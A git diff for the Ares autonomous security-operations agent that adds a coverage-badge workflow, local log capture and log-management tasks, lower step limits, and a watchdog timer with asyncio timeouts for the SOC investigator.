diff --git a/.github/badges/coverage.svg b/.github/badges/coverage.svg
new file mode 100644
index 00000000..f9095ee3
--- /dev/null
+++ b/.github/badges/coverage.svg
@@ -0,0 +1,16 @@
+
diff --git a/.github/workflows/coverage-badge.yaml b/.github/workflows/coverage-badge.yaml
new file mode 100644
index 00000000..0f1d7211
--- /dev/null
+++ b/.github/workflows/coverage-badge.yaml
@@ -0,0 +1,49 @@
+---
+name: 📊 Coverage Badge
+
+on:
+ workflow_run:
+ workflows: ["🐍 Python Tests"]
+ types:
+ - completed
+ branches:
+ - main
+
+permissions:
+ contents: write
+
+jobs:
+ badge:
+ name: 📊 Generate coverage badge
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == 'success'
+
+ steps:
+ - name: Set up git repository
+ uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
+
+ - name: Download coverage artifact
+ uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8
+ with:
+ name: coverage-report
+ run-id: ${{ github.event.workflow_run.id }}
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Set up Python
+ uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
+ with:
+ python-version: "3.12"
+
+ - name: Generate coverage badge
+ run: |
+ pip install "genbadge[coverage]"
+ mkdir -p .github/badges
+ genbadge coverage -i coverage.xml -o .github/badges/coverage.svg
+
+ - name: Commit badge
+ run: |
+ git config --local user.email "github-actions[bot]@users.noreply.github.com"
+ git config --local user.name "github-actions[bot]"
+ git add .github/badges/coverage.svg
+ git diff --staged --quiet || git commit -m "Update coverage badge [skip ci]"
+ git push
diff --git a/.github/workflows/tests.yaml b/.github/workflows/tests.yaml
index 0ff24b80..9f83af99 100644
--- a/.github/workflows/tests.yaml
+++ b/.github/workflows/tests.yaml
@@ -55,4 +55,12 @@ jobs:
- name: Run tests with coverage
run: |
- pytest --cov=src --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist
+ pytest --cov=src --cov-report=xml --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist
+
+ - name: Upload coverage report
+ if: github.ref == 'refs/heads/main' && github.event_name == 'push' && matrix.python-version == '3.12'
+ uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+ with:
+ name: coverage-report
+ path: coverage.xml
+ retention-days: 1
diff --git a/.gitignore b/.gitignore
index 6450c881..0bef9302 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,6 +6,7 @@ test-alerts/
TODO
.tool-versions
/reports/
+/logs/
# Custom parquet storage
*.parquet
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 8a47f4ed..c196b5b5 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -93,6 +93,7 @@ repos:
rev: v1.19.1
hooks:
- id: mypy
+ exclude: ^tests/
additional_dependencies:
- "types-PyYAML"
- "types-requests"
diff --git a/README.md b/README.md
index 52f373c7..093cd982 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,15 @@
# Ares - Autonomous Security Operations Agent
+
+
+
+[](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml)
+[](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml)
+[](https://opensource.org/licenses/Apache-2.0)
+
+
+
+
[](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml)
[](https://opensource.org/licenses/Apache-2.0)
[](https://www.python.org/downloads/)
@@ -161,7 +171,7 @@ uv run python -m ares \
--args.model claude-sonnet-4-20250514 \
--args.grafana-url https://grafana.example.com \
--args.poll-interval 30 \
- --args.max-steps 150 \
+ --args.max-steps 30 \
--args.report-dir ./reports
# Run once and exit (process current alerts only)
@@ -176,7 +186,7 @@ Investigate a specific alert by providing it as JSON:
uv run python -m ares investigate-alert test-alerts/example-alert.json \
--args.model claude-sonnet-4-20250514 \
--args.grafana-url https://grafana.example.com \
- --args.max-steps 150
+ --args.max-steps 30
```
#### Red Team - Penetration Testing
@@ -212,7 +222,7 @@ task ares:red: TARGET=192.168.1.100
# Or via CLI
uv run python -m ares red-team 192.168.1.100 \
--args.model claude-sonnet-4-20250514 \
- --args.max-steps 150 \
+ --args.max-steps 30 \
--args.report-dir ./reports
```
@@ -229,8 +239,27 @@ bloodhound-python).
| `--args.model` | `claude-sonnet-4-20250514` | LLM model to use |
| `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP |
| `--args.poll-interval` | `30` | Seconds between alert polls |
-| `--args.max-steps` | `150` | Maximum agent steps per investigation |
+| `--args.max-steps` | `30` | Maximum LLM round trips per investigation |
| `--args.report-dir` | `./reports` | Directory for markdown reports |
+| `--args.once` | `false` | Process current alerts once and exit |
+
+**Stop Conditions:**
+
+The agent stops when **any** of these conditions are met:
+
+- `complete_investigation()` tool is called (normal completion)
+- `escalate_investigation()` tool is called (escalation to human)
+- 5 Loki/Prometheus queries executed
+- 20 total tool calls made (prevents infinite loops)
+- `max_steps` LLM round trips reached
+
+**Timeout Behavior:**
+
+The agent has multiple timeout layers:
+
+- Hard timeout: `max_steps × 60 seconds` (1 minute per step)
+- Watchdog thread: Force-exits if timeout exceeded
+- When using Taskfile, defaults are 15 steps (once mode) or 50 steps (polling mode)
**Dreadnode Platform Arguments (`--dn-args.*`):**
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 3c6a004b..bdfc31a2 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -15,8 +15,10 @@ vars:
MODEL: '{{.MODEL | default "claude-sonnet-4-20250514"}}'
GRAFANA_URL: '{{.GRAFANA_URL | default "https://grafana.dev.plundr.ai"}}'
POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}'
- MAX_STEPS: '{{.MAX_STEPS | default "150"}}'
+ MAX_STEPS: '{{.MAX_STEPS | default "50"}}'
+ MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode
REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}'
+ LOG_DIR: '{{.LOG_DIR | default "./logs"}}'
DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}'
DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}'
DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE | default "ares-protocol"}}'
@@ -153,13 +155,17 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "")
export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "")
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
@@ -170,7 +176,8 @@ tasks:
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:once:
desc: Run blue team agent once and exit (uses 1Password for API keys)
@@ -178,25 +185,30 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "")
export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "")
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
--args.poll-interval {{.POLL_INTERVAL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--args.once \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:local:
desc: Run blue team agent using .env file (no 1Password)
@@ -204,7 +216,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
if [ ! -f .env ]; then
@@ -216,6 +228,10 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
@@ -225,7 +241,8 @@ tasks:
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:local:once:
desc: Run blue team agent once and exit using .env file (no 1Password)
@@ -233,7 +250,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
if [ ! -f .env ]; then
@@ -245,17 +262,22 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
--args.poll-interval {{.POLL_INTERVAL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--args.once \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:investigate:
desc: "Investigate a specific alert from JSON file (usage: task ares:investigate ALERT=alert.json)"
@@ -270,7 +292,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
@@ -280,7 +302,7 @@ tasks:
uv run python -m ares investigate-alert {{.ALERT}} \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.token "$DREADNODE_API_KEY" \
@@ -408,6 +430,99 @@ tasks:
echo "✅ Reports cleaned"
fi
+ # ===========================================================================
+ # Ares Local Log Management
+ # ===========================================================================
+
+ ares:logs:list:
+ desc: List all local agent logs
+ cmds:
+ - |
+ echo "Agent Logs:"
+ echo "==========="
+ if [ -d {{.LOG_DIR}} ]; then
+ ls -lht {{.LOG_DIR}}/*.log 2>/dev/null || echo "No logs found"
+ else
+ echo "Log directory not found: {{.LOG_DIR}}"
+ fi
+
+ ares:logs:tail:
+ desc: "Tail the latest log file (usage: task ares:logs:tail [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Log file: $LATEST"
+ echo "======================================================================"
+
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:blue:
+ desc: "Tail the latest blue team log (usage: task ares:logs:blue [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/blue-*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No blue team logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Blue team log: $LATEST"
+ echo "======================================================================"
+
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:red:
+ desc: "Tail the latest red team log (usage: task ares:logs:red [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/red-*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No red team logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Red team log: $LATEST"
+ echo "======================================================================"
+
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:clean:
+ desc: Remove all local agent logs
+ cmds:
+ - |
+ read -p "Delete all logs in {{.LOG_DIR}}? (y/N) " -n 1 -r
+ echo
+ if [[ $REPLY =~ ^[Yy]$ ]]; then
+ rm -rf {{.LOG_DIR}}/*.log
+ echo "✅ Logs cleaned"
+ fi
+
ares:version:
desc: Show Ares version information
cmds:
@@ -450,7 +565,7 @@ tasks:
internal: true
vars:
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
# Check if AWS CLI is installed
@@ -485,7 +600,7 @@ tasks:
vars:
TARGET: '{{.TARGET | default ""}}'
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
REDTEAM_PROJECT: '{{.REDTEAM_PROJECT | default "ares-redteam"}}'
preconditions:
- sh: test -n "{{.TARGET}}"
@@ -521,6 +636,10 @@ tasks:
echo "✅ Resolved to: $RESOLVED_TARGET"
fi
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares red-team "$RESOLVED_TARGET" \
--args.model {{.MODEL}} \
--args.max-steps {{.MAX_STEPS}} \
@@ -529,7 +648,8 @@ tasks:
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.REDTEAM_PROJECT}}
+ --dn-args.project {{.REDTEAM_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:red:local:
desc: "Run red team agent using .env file (usage: task ares:red:local TARGET=192.168.1.100)"
@@ -550,6 +670,10 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares red-team {{.TARGET}} \
--args.model {{.MODEL}} \
--args.max-steps {{.MAX_STEPS}} \
@@ -557,16 +681,17 @@ tasks:
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.REDTEAM_PROJECT}}
+ --dn-args.project {{.REDTEAM_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:red:logs:
desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])"
vars:
- KALI: '{{.KALI | default "dev-alpha-operator-range-kali"}}'
+ KALI: '{{.KALI | default "staging-alpha-operator-range-kali"}}'
LINES: '{{.LINES | default "100"}}'
FOLLOW: '{{.FOLLOW | default "false"}}'
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
deps:
- task: check-aws-auth
vars:
diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md
index 9e5bf841..1b7d53f3 100644
--- a/docs/taskfile_usage.md
+++ b/docs/taskfile_usage.md
@@ -304,13 +304,39 @@ All tasks support the following configuration variables:
| `MODEL` | `claude-sonnet-4-20250514` | LLM model to use |
| `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts |
| `POLL_INTERVAL` | `30` | Seconds between alert polls |
-| `MAX_STEPS` | `150` | Maximum agent steps per investigation |
+| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (Taskfile override, code default is 30) |
+| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes |
| `REPORT_DIR` | `./reports` | Directory for markdown reports |
| `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL |
| `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name |
| `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name |
| `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name |
+**Stop Conditions:**
+
+The agent will stop when **any** of these conditions are met:
+
+- Agent calls `complete_investigation()` (normal completion)
+- Agent calls `escalate_investigation()` (escalation to human)
+- 5 Loki/Prometheus queries executed
+- **20 total tool calls made** (prevents infinite loops)
+- `max_steps` LLM round trips reached
+
+**Timeout Behavior:**
+
+The agent has multiple timeout layers:
+
+- Hard timeout: `max_steps × 60 seconds` (1 minute per step)
+- Watchdog thread: Force-exits if timeout exceeded
+
+| Mode | Default Steps | Max Timeout |
+| --- | --- | --- |
+| `ares:blue:once:` | 15 | ~15 minutes |
+| `ares:blue:local:once:` | 15 | ~15 minutes |
+| `ares:investigate` | 15 | ~15 minutes |
+| `ares:blue:` (polling) | 50 | ~50 minutes per alert |
+| `ares:blue:local:` (polling) | 50 | ~50 minutes per alert |
+
**Example with custom variables:**
```bash
diff --git a/pyproject.toml b/pyproject.toml
index 2db34b49..ede9da03 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -21,6 +21,7 @@ dependencies = [
"cyclopts>=4.2.0",
"loguru>=0.7.3",
"httpx>=0.28.0,<1.0.0",
+ "boto3>=1.42.25",
]
[project.optional-dependencies]
diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py
index 6a4e3f16..769f9584 100644
--- a/src/ares/agents/blue/soc_investigator.py
+++ b/src/ares/agents/blue/soc_investigator.py
@@ -4,6 +4,8 @@
Main agent implementation using Dreadnode Agent SDK.
"""
+import os
+import threading
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
@@ -11,12 +13,76 @@
import dreadnode as dn
from loguru import logger
-from ares.core.factories.blue_factory import create_investigation_agent
-from ares.core.models import InvestigationState
+from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking
+from ares.core.models import InvestigationState, TimelineEvent
+from ares.core.persistence import (
+ create_stored_investigation_from_state,
+ get_investigation_store,
+)
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
+class InvestigationTimeoutError(Exception):
+ """Raised when investigation exceeds hard timeout."""
+
+
+class WatchdogTimer:
+ """Watchdog that generates report and forcefully exits if timeout is exceeded."""
+
+ def __init__(
+ self,
+ timeout_seconds: int,
+ investigation_id: str,
+ state: "InvestigationState",
+ report_dir: Path,
+ ):
+ self.timeout = timeout_seconds
+ self.investigation_id = investigation_id
+ self.state = state
+ self.report_dir = report_dir
+ self._timer: threading.Timer | None = None
+ self._cancelled = False
+
+ def _timeout_handler(self) -> None:
+ if self._cancelled:
+ return
+
+ logger.critical(
+ f"WATCHDOG: Investigation {self.investigation_id} exceeded "
+ f"hard timeout of {self.timeout}s"
+ )
+ logger.warning(
+ f"Current state: {len(self.state.evidence)} evidence items, "
+ f"{len(self.state.timeline)} timeline events"
+ )
+
+ # Generate partial report before dying
+ try:
+ from ares.reports.investigation import MarkdownReportGenerator
+
+ generator = MarkdownReportGenerator(self.report_dir)
+ report_path = generator.generate(self.state)
+ logger.warning(f"Partial report saved to: {report_path}")
+ except Exception as e:
+ logger.error(f"Failed to generate partial report: {e}")
+
+ logger.critical("Forcing exit due to timeout")
+ os._exit(1)
+
+ def start(self) -> None:
+ self._timer = threading.Timer(self.timeout, self._timeout_handler)
+ self._timer.daemon = True
+ self._timer.start()
+ logger.info(f"Watchdog started: {self.timeout}s ({self.timeout // 60}m)")
+
+ def cancel(self) -> None:
+ self._cancelled = True
+ if self._timer:
+ self._timer.cancel()
+ logger.debug("Watchdog cancelled")
+
+
def build_initial_prompt(alert: dict) -> str:
"""Build the initial prompt with alert context.
@@ -44,7 +110,6 @@ def build_initial_prompt(alert: dict) -> str:
if key in labels:
mitre_technique = labels[key]
break
- # Also check annotations
if not mitre_technique:
for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
if key in annotations:
@@ -97,7 +162,7 @@ def __init__(
grafana_api_key: str,
mitre_client: MITREAttackClient,
report_dir: Path,
- max_steps: int = 150,
+ max_steps: int = 30,
):
self.model = model
self.grafana_url = grafana_url
@@ -109,19 +174,28 @@ def __init__(
self._mcp_tools = None
async def _ensure_mcp_connection(self) -> None:
- """Ensure MCP connection is established."""
+ """Ensure MCP connection is established (with 60s timeout)."""
+ import asyncio
+
if self._mcp_client is None:
from ares.tools.blue.grafana import connect_grafana_mcp
try:
logger.info("Connecting to Grafana MCP server...")
- self._mcp_client = await connect_grafana_mcp(
- grafana_url=self.grafana_url,
- grafana_api_key=self.grafana_api_key,
+ self._mcp_client = await asyncio.wait_for( # type: ignore[func-returns-value]
+ connect_grafana_mcp(
+ grafana_url=self.grafana_url,
+ grafana_api_key=self.grafana_api_key,
+ ),
+ timeout=60.0,
)
self._mcp_tools = self._mcp_client.tools
tool_count = len(self._mcp_tools) if self._mcp_tools else 0
logger.success(f"Grafana MCP connected ({tool_count} tools available)")
+ except asyncio.TimeoutError:
+ logger.warning("Grafana MCP connection timed out after 60s")
+ logger.warning("Continuing without MCP tools")
+ self._mcp_tools = None
except Exception as e:
logger.warning(f"Failed to connect to Grafana MCP: {e}")
logger.warning("Continuing without MCP tools")
@@ -129,10 +203,18 @@ async def _ensure_mcp_connection(self) -> None:
async def _shutdown_mcp(self) -> None:
"""Shutdown MCP connection if active."""
+ import asyncio
+
if self._mcp_client:
try:
- await self._mcp_client.__aexit__(None, None, None)
+ # Add timeout to prevent hanging on shutdown
+ await asyncio.wait_for(
+ self._mcp_client.__aexit__(None, None, None),
+ timeout=10.0,
+ )
logger.info("Grafana MCP connection closed")
+ except asyncio.TimeoutError:
+ logger.warning("MCP shutdown timed out after 10s, forcing close")
except Exception as e:
logger.warning(f"Error closing MCP connection: {e}")
finally:
@@ -158,108 +240,298 @@ async def investigate(self, alert: dict) -> dict:
- highest_pyramid_level: Highest Pyramid of Pain level reached (1-6)
Raises:
- TimeoutError: If investigation exceeds the configured timeout.
+ InvestigationTimeoutError: If investigation exceeds the hard timeout.
"""
investigation_id = f"inv-{uuid.uuid4().hex[:8]}"
alert_name = alert.get("labels", {}).get("alertname", "unknown")
logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}")
- # Ensure MCP connection is ready
- await self._ensure_mcp_connection()
+ # Reset query tracking for this investigation
+ reset_query_tracking()
- # Create investigation state
+ # Create investigation state early so we can generate partial reports on timeout
state = InvestigationState(
investigation_id=investigation_id,
alert=alert,
)
- # Auto-extract and record MITRE technique from alert
+ # Hard timeout using watchdog thread (works even if event loop is blocked)
+ # 1 minute per step + 2 minutes buffer for setup/teardown
+ hard_timeout_seconds = (self.max_steps * 60) + 120
+ watchdog = WatchdogTimer(
+ hard_timeout_seconds,
+ investigation_id,
+ state,
+ self.report_dir,
+ )
+ watchdog.start()
+
+ try:
+ # Ensure MCP connection is ready
+ await self._ensure_mcp_connection()
+
+ # Auto-extract and record MITRE technique from alert
+ labels = alert.get("labels", {})
+ annotations = alert.get("annotations", {})
+ for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
+ if labels.get(key):
+ tech_id = labels[key]
+ state.identified_techniques.add(tech_id)
+ # Resolve technique name and tactic
+ technique = self.mitre_client.get_technique(tech_id)
+ if technique:
+ state.technique_names[tech_id] = technique.name
+ state.technique_to_tactic[tech_id] = technique.tactic or "Unknown"
+ if technique.tactic:
+ state.identified_tactics.add(technique.tactic)
+ logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}")
+ break
+ if annotations.get(key):
+ tech_id = annotations[key]
+ state.identified_techniques.add(tech_id)
+ # Resolve technique name and tactic
+ technique = self.mitre_client.get_technique(tech_id)
+ if technique:
+ state.technique_names[tech_id] = technique.name
+ state.technique_to_tactic[tech_id] = technique.tactic or "Unknown"
+ if technique.tactic:
+ state.identified_tactics.add(technique.tactic)
+ logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}")
+ break
+
+ self._create_alert_timeline_event(state, alert)
+
+ initial_prompt = build_initial_prompt(alert)
+
+ with dn.run(tags=["soc-investigation", alert_name]):
+ dn.log_params(
+ model=self.model,
+ investigation_id=investigation_id,
+ alert_name=alert_name,
+ alert_severity=alert.get("labels", {}).get("severity", "unknown"),
+ max_steps=self.max_steps,
+ mcp_tools_available=self._mcp_tools is not None,
+ mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0,
+ )
+ dn.log_input("alert", alert)
+
+ agent = create_investigation_agent(
+ model=self.model,
+ grafana_url=self.grafana_url,
+ grafana_api_key=self.grafana_api_key,
+ mitre_client=self.mitre_client,
+ state=state,
+ grafana_mcp_tools=self._mcp_tools,
+ max_steps=self.max_steps,
+ )
+
+ # Run the investigation with asyncio timeout (backup to watchdog)
+ try:
+ import asyncio
+
+ logger.info(f"Starting agent.run() with max_steps={self.max_steps}")
+
+ # Asyncio timeout as secondary measure
+ timeout_seconds = self.max_steps * 60
+
+ result = await asyncio.wait_for(
+ agent.run(initial_prompt),
+ timeout=timeout_seconds,
+ )
+
+ logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}")
+
+ status = "completed"
+ if state.escalated:
+ status = "escalated"
+ elif result.stop_reason and "max" in str(result.stop_reason).lower():
+ status = "incomplete"
+ logger.warning(
+ f"Agent reached max_steps ({self.max_steps}) without completion"
+ )
+
+ # Generate report
+ report_path = self._generate_report(state, result)
+
+ # Persist investigation for learning
+ self._persist_investigation(state, status)
+
+ dn.log_output("report_path", str(report_path))
+ dn.log_metric("investigation_success", 1)
+
+ return {
+ "investigation_id": investigation_id,
+ "status": status,
+ "report_path": str(report_path),
+ "evidence_count": len(state.evidence),
+ "techniques_identified": list(state.identified_techniques),
+ "highest_pyramid_level": state.highest_pyramid_level,
+ }
+
+ except asyncio.TimeoutError:
+ logger.error(f"Investigation timed out after {timeout_seconds}s (asyncio)")
+ logger.error(
+ f"Current state: {len(state.evidence)} evidence items, "
+ f"{len(state.timeline)} timeline events"
+ )
+ dn.log_metric("investigation_timeout", 1)
+
+ # Still generate a partial report on timeout
+ report_path = self._generate_report(state, None)
+
+ # Persist investigation for learning (even on timeout)
+ self._persist_investigation(state, "timeout")
+
+ return {
+ "investigation_id": investigation_id,
+ "status": "timeout",
+ "report_path": str(report_path),
+ "evidence_count": len(state.evidence),
+ "techniques_identified": list(state.identified_techniques),
+ "highest_pyramid_level": state.highest_pyramid_level,
+ }
+
+ except Exception as e:
+ logger.error(f"Investigation failed: {e}")
+ dn.log_metric("investigation_failed", 1)
+
+ # Persist failed investigation
+ self._persist_investigation(state, "failed")
+ raise
+
+ finally:
+ # Always cancel the watchdog on normal completion
+ watchdog.cancel()
+
+ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) -> None:
+ """Create an initial timeline event from the alert."""
labels = alert.get("labels", {})
annotations = alert.get("annotations", {})
- for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
+
+ starts_at = alert.get("startsAt", "")
+ try:
+ if starts_at:
